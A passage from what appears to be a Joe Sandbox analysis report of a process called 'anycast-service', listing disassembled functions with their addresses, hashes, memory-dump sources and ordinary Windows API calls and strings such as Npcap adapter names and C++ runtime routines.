                                                                                                                              • Opcode Fuzzy Hash: 22d39cdde8d6275e4184fa42d2b43b7a88eea6e06547045c4963ead59c204c12
                                                                                                                              • Instruction Fuzzy Hash: 4C515172A0CA8186DB208B59F44066AB7A5FB8C7E4F504039FB8D43798DF3CD456CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80152B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 172synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _invalid_parameter_noinfo$ErrorLastMutexObjectReleaseSingleWait_invalid_parameter_noinfo_noreturn
                                                                                                                              • String ID: NPF_Loopback$WIFI_
                                                                                                                              • API String ID: 3126114793-3637302619
                                                                                                                              • Opcode ID: 03e342c648b6af448e86c594fb62b8a7be52f87377ef15f61af0dc4c9446d3fb
                                                                                                                              • Instruction ID: ef2ce2d06a576ef20f0dc0b5b0b73ad9b45862b5e9fd97b3048506aa8df12a9f
                                                                                                                              • Opcode Fuzzy Hash: 03e342c648b6af448e86c594fb62b8a7be52f87377ef15f61af0dc4c9446d3fb
                                                                                                                              • Instruction Fuzzy Hash: D6615E32A08686D2EE60AB1AE4413BA6351FB897F8F444231EB6D0B6D5DF7CE447C714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F89AA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameName::$Name::operator+
                                                                                                                              • String ID: `non-type-template-parameter
                                                                                                                              • API String ID: 826178784-4247534891
                                                                                                                              • Opcode ID: a0000099f1c8c603f6ed5313652d94a5fc3ba8a30e4dcef5ba93ddb305da3257
                                                                                                                              • Instruction ID: f5c0c7d74cc354f64c49daade774c43e3038cd9c60dfbeac6f3d9b7431acd679
                                                                                                                              • Opcode Fuzzy Hash: a0000099f1c8c603f6ed5313652d94a5fc3ba8a30e4dcef5ba93ddb305da3257
                                                                                                                              • Instruction Fuzzy Hash: 99416B32F18682DAEB10CB69D9909BC33A4FB517CAF544035DB4D57B96EF38E9168308
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8CCF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NameName::atol
                                                                                                                              • String ID: `template-parameter$void
                                                                                                                              • API String ID: 2130343216-4057429177
                                                                                                                              • Opcode ID: 397ec0b06f3c275e295a54db3ffecb6b2507773b95bb19b77ebd927400b5dd6e
                                                                                                                              • Instruction ID: 18ba76af9c1841a408583765c10ca632f6e737f1049a3fdb055e8ecd2d5700ba
                                                                                                                              • Opcode Fuzzy Hash: 397ec0b06f3c275e295a54db3ffecb6b2507773b95bb19b77ebd927400b5dd6e
                                                                                                                              • Instruction Fuzzy Hash: 99415732F08A52C9FB509BA8D8416BC23B1BB5878AF540136CF0D1BB9ADF3CE4468344
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B801A51C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF8B801A723,?,?,?,00007FF8B8018482,?,?,?,00007FF8B8017E99), ref: 00007FF8B801A5A1
                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FF8B801A723,?,?,?,00007FF8B8018482,?,?,?,00007FF8B8017E99), ref: 00007FF8B801A5AF
                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF8B801A723,?,?,?,00007FF8B8018482,?,?,?,00007FF8B8017E99), ref: 00007FF8B801A5D9
                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF8B801A723,?,?,?,00007FF8B8018482,?,?,?,00007FF8B8017E99), ref: 00007FF8B801A61F
                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,00007FF8B801A723,?,?,?,00007FF8B8018482,?,?,?,00007FF8B8017E99), ref: 00007FF8B801A62B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                              • String ID: api-ms-
                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                              • Opcode ID: e6f302523cefb3be14a5963e39c2837677e7017135b21816833bd11826eae055
                                                                                                                              • Instruction ID: c3c8591b8ca4db0a2a1fc106b02a81e35afce0a524b49e3add1c3c2bc7206c80
                                                                                                                              • Opcode Fuzzy Hash: e6f302523cefb3be14a5963e39c2837677e7017135b21816833bd11826eae055
                                                                                                                              • Instruction Fuzzy Hash: 99319221A1A642D5EF11EB1AA40067622A4BF08BF0F594535FF1D473E0EF3CE4479708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F882F0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                              • API String ID: 2943138195-2211150622
                                                                                                                              • Opcode ID: 9a4c4095f2f269ae6c55d4d8470e6b2abb27a1d294853a807a42e0478d05023c
                                                                                                                              • Instruction ID: 179de5f7a98641a613a3193654a08da2f0b7752c7397d0d29ae6b051f217b3b4
                                                                                                                              • Opcode Fuzzy Hash: 9a4c4095f2f269ae6c55d4d8470e6b2abb27a1d294853a807a42e0478d05023c
                                                                                                                              • Instruction Fuzzy Hash: 22413672E28B46D9FB118B68E8406B837B0BB58789F444131DB4C53756DF3CE546C348
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F89E48 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: char $int $long $short $unsigned
                                                                                                                              • API String ID: 2943138195-3894466517
                                                                                                                              • Opcode ID: 069ed363c7d9135c3fcae5d350c2f3f23bc36f3c651013ecd9084eeae79e0862
                                                                                                                              • Instruction ID: f650127a5321e565429a6eb331e10be63d1fb12d2ccb17f5d7c57d1a788a362e
                                                                                                                              • Opcode Fuzzy Hash: 069ed363c7d9135c3fcae5d350c2f3f23bc36f3c651013ecd9084eeae79e0862
                                                                                                                              • Instruction Fuzzy Hash: 9D315632F18656C9EB158B6CD8406BC37B4EB08789F844036DB8C5679ADF2CE592C758
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80128A0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 66memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$AllocFree
                                                                                                                              • String ID: %s%s$NPCAP$NPF
                                                                                                                              • API String ID: 756756679-2222208879
                                                                                                                              • Opcode ID: e6acc0af5b1d1da65a462994ede6faae4a167309188efc99e88c6504aee98263
                                                                                                                              • Instruction ID: 81a276b8fbcf8573643f8a6a0929ff0247dffcc18ef1e2bedcdeddc16ec19714
                                                                                                                              • Opcode Fuzzy Hash: e6acc0af5b1d1da65a462994ede6faae4a167309188efc99e88c6504aee98263
                                                                                                                              • Instruction Fuzzy Hash: 7B213D11F0964381EF15E75EA9002BA6291AF5ABD0F884035EF4C467D9EF3CE5478718
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8013F80 Relevance: 10.6, APIs: 7, Instructions: 50fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$FileWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 603252729-0
                                                                                                                              • Opcode ID: cef997ebef338322b7b62d190f4c1c9ec07a2d690ff929508a20b96bf8f45f5c
                                                                                                                              • Instruction ID: 7b2dd1bdf5f80b79e4f05817febdf97d4ec7089f25944e1bb0ba85b173d24f73
                                                                                                                              • Opcode Fuzzy Hash: cef997ebef338322b7b62d190f4c1c9ec07a2d690ff929508a20b96bf8f45f5c
                                                                                                                              • Instruction Fuzzy Hash: 07114C65B5464683EF405B7AD45823823A0BB4CBE2F440436EE4D833E0CF3DE4ABC618
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802FD8C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                              • String ID: CONOUT$
                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                              • Opcode ID: efdba200c510ca5ffb8dcbcdc501346ede47d8e608a7b413007eef732dd0fb00
                                                                                                                              • Instruction ID: f39216ed5c3d9d5e8503653fa2200923d215da072cc29b354d6ba479b677e124
                                                                                                                              • Opcode Fuzzy Hash: efdba200c510ca5ffb8dcbcdc501346ede47d8e608a7b413007eef732dd0fb00
                                                                                                                              • Instruction Fuzzy Hash: 80118E21A18B428AEB508B5BE84432962A4FB9CBE4F004334EB5D87BD4DF7CD4078748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80145D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38synchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDeviceObjectSingleWait
                                                                                                                              • String ID: <h!
                                                                                                                              • API String ID: 3491303119-863843351
                                                                                                                              • Opcode ID: 6a27ee6fdaa57e622e7cca03630b2a65079f84d41522d40b0d232d7e0f35afce
                                                                                                                              • Instruction ID: 716ccd9d3e7ac6cc36d4109c0278b689be079758c86ac9cf7a9f1b359e061148
                                                                                                                              • Opcode Fuzzy Hash: 6a27ee6fdaa57e622e7cca03630b2a65079f84d41522d40b0d232d7e0f35afce
                                                                                                                              • Instruction Fuzzy Hash: B8014C72A08B8182EF404B65A05436A73A1FB897E4F444135EB8E077E4CF7DC48B8B05
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8011840 Relevance: 9.1, APIs: 6, Instructions: 129memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$AllocFreeMutexObjectReleaseSingleWait_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3638234542-0
                                                                                                                              • Opcode ID: f795ad3e27e4c2f1fc990534afae1b6c3a1ccdac5de692239b7d4918fd07b002
                                                                                                                              • Instruction ID: c60240d37e6a9104ae92e20a9b2458176e71fef762e8f8dd3f632d18ba47e359
                                                                                                                              • Opcode Fuzzy Hash: f795ad3e27e4c2f1fc990534afae1b6c3a1ccdac5de692239b7d4918fd07b002
                                                                                                                              • Instruction Fuzzy Hash: D7517A71A09B8285EF659F2AA8182BA2691BF49BE4F584135DB9D073D4DF3CE1078314
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F86030 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3741236498-0
                                                                                                                              • Opcode ID: 66aa6ad09a60ee67b1cb65c876997c95f9294690b32403b8214b5ddab6a0748e
                                                                                                                              • Instruction ID: 1001151c643f85f5e37e1ba4f9e81d866671a00c345b380fded459d190fe807d
                                                                                                                              • Opcode Fuzzy Hash: 66aa6ad09a60ee67b1cb65c876997c95f9294690b32403b8214b5ddab6a0748e
                                                                                                                              • Instruction Fuzzy Hash: 6C31AE32B19B5681EB15CB69A80896923A4BF48FD5F544631DF2D03392EF3DD447C348
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8018A08 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 324COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 3523768491-393685449
                                                                                                                              • Opcode ID: 442f5b22083630dda40d9dac1533f5804c24e438fe99c573b21cd18d643bc642
                                                                                                                              • Instruction ID: ce756122d5aa2ab2cab239af1b9139027b6a672400e2094144f58d3786dbdbc0
                                                                                                                              • Opcode Fuzzy Hash: 442f5b22083630dda40d9dac1533f5804c24e438fe99c573b21cd18d643bc642
                                                                                                                              • Instruction Fuzzy Hash: 66E18073908781CAEB60AB28D4802AE77A0FB557E8F544135EB8D476D6CF38E687C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8013EC0 Relevance: 9.1, APIs: 6, Instructions: 52synchronizationfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ObjectSingleWait$FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 505756965-0
                                                                                                                              • Opcode ID: a0a38a4d05c873d9de1416db235130dfca9c9a07f98f6997400525d99666a66b
                                                                                                                              • Instruction ID: 1ecf4745dec7eee28243f6fd4bc1b2033029ba235f764408a59dbdb129191ae3
                                                                                                                              • Opcode Fuzzy Hash: a0a38a4d05c873d9de1416db235130dfca9c9a07f98f6997400525d99666a66b
                                                                                                                              • Instruction Fuzzy Hash: 26215E35B14A4282EF508B7ED54426923B1FB88BE4F508231EB1D83AE4DF3DE8678604
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80147E0 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: 58c327d1875570254b924f32f644819d62bd87dcd8279b6174ae910fab1d89c7
                                                                                                                              • Instruction ID: 077f28ac68904b454883381877033b9d18c970a102f5f1e0a4c5fdc696f9b0ef
                                                                                                                              • Opcode Fuzzy Hash: 58c327d1875570254b924f32f644819d62bd87dcd8279b6174ae910fab1d89c7
                                                                                                                              • Instruction Fuzzy Hash: 81114C71A54B8187EF508B6AA49442D73A0FB48BD1F045435EA8E437A0CF7CD8ABCB14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014240 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
